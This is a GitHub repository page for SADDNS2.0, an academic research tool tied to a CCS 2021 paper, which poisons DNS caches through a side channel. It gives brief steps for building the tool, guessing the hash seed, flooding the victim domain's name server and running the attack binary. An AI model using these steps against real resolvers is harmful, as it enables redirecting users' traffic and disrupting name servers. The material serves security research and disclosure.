Skip to content

seclab-ucr/SADDNS2.0

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits

src/ucr.edu/SADDNS2.0

src/ucr.edu/SADDNS2.0

 
 

LICENCE

LICENCE

 
 

README.md

README.md

 
 

guessSeed4.c

guessSeed4.c

 
 

Repository files navigation

SADDNS2.0: DNS Cache Poisoning Attack: Resurrections with Side Channels

Introduction

SADDNS2.0 is a tool for launching the DNS cache poisoning attack. It infers the ephemeral port number and brute forces the TxID by exploiting Forwarding Information Base(FIB) Next Hop Exception(FNHE) cache as a side channel.

This is a different side channel cache poisoning attack derived from SADDNS. Most code usage may remain the same.

How it works

  1. Scan ephemeral ports opened by the resolver.
  2. Brute force TxID.

The side channel leverages the hash table storing fnhe entry as a shared resource (between the spoofed and non-spoofed IPs), which controls whether an IP packet should be fragmented or not. This gives the off-path attacker the ability to identify whether previous spoofed ICMP fragment needed packets were accepted or not, which further indicates whether the guessed port is correct or not.

The following figure shows the detail of inferring ephemeral ports.

Off-path port scanning

Why spoofed IP is still necessary?

  • Compared with SADDNS, SADDNS2.0 uses embedded UDP packet to scan open port and therefore no IP spoofing is needed during the scanning phase.
  • IP spoofing is still required for injecting rogue responses.

Additional resources

Publication

DNS Cache Poisoning Attack: Resurrections with Side Channels

Keyu Man, Xin'an Zhou, Zhiyun Qian

In Proceedings of ACM Conference on Computer and Communications Security (CCS`21), November 15-19, 2021, Virtual Event, Republic of Korea.

Website

SADDNS

How to run

Requirements

  • An IP-spoofing-capable host (preferably Linux. Windows is ok but suffers from low performance.).
  • A domain (attacker-controlled name server)
  • Other things needed to make clear:
    • The resolver to poison (victim resolver)
    • The domain to poison (victim domain)
    • The victim domain's record will be poisoned on the victim resolver.

Overview

  • Determine the attack type (e.g., public or private port, fragment needed or redirect packet as the payload).
  • Guess the seed/key of FNHE hsah table if private port is used.
  • Flood query traffic to mute the name server of the victim domain (see SADDNS repo for flooding scripts).
  • Run attack program to guess the port number and TxID automatically.

Steps

  1. Compile

    go build ucr.edu/SADDNS2.0(requires gopacket and libpcap)

  2. Seed guessing (only required when probing private ports)

    See the paper for details. GuessSeed.go provides methods to send out seed guessing packets. guessSeed4.c implements hash guessing functions to guess the seed.

  3. Start flooding

    ./dns_query.sh &(requires hping3)

    Please see the comment in the file for usage.

  4. Start attacking (flooding is still in progress)

    sudo ./saddns [args]

    Run ./saddns -h for usage.

Questions and issues

Please submit them by opening a new issue.

About

No description, website, or topics provided.

Resources

Readme

License

ODbL-1.0 license
Activity
Custom properties

Stars

11 stars

Watchers

4 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages